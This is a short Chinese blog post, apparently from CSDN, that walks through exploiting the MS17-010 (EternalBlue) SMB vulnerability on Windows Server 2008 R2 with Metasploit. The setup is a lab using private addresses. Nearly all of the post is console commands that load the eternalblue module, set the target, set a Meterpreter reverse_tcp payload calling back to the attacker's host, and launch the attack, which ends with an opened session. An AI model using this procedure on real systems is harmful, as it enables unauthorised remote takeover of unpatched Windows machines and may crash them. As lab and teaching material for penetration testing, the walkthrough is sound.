使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
2017-10-11 10:38:02 D-river 阅读数 23523更多
分类专栏: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013672940/article/details/78200950
0x01 实验环境
攻击机:kali linux
ip:10.10.10.131
目标机:windows 2008 R2
ip:10.10.10.132
0x02 配置exploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.10.10.132
rhost => 10.10.10.132
查看选项
msf exploit(ms17_010_eternalblue) > show options
设置目标机的IP,其他选项默认就可以;
注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;
0x03 配置payload
payload只需要配置监听返回会话的IP;
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131
lhost => 10.10.10.131
0x04 开始攻击
警告:攻击过程可能导致目标系统宕机重启,谨慎操作!
msf exploit(ms17_010_eternalblue) > exploit
成功获得session。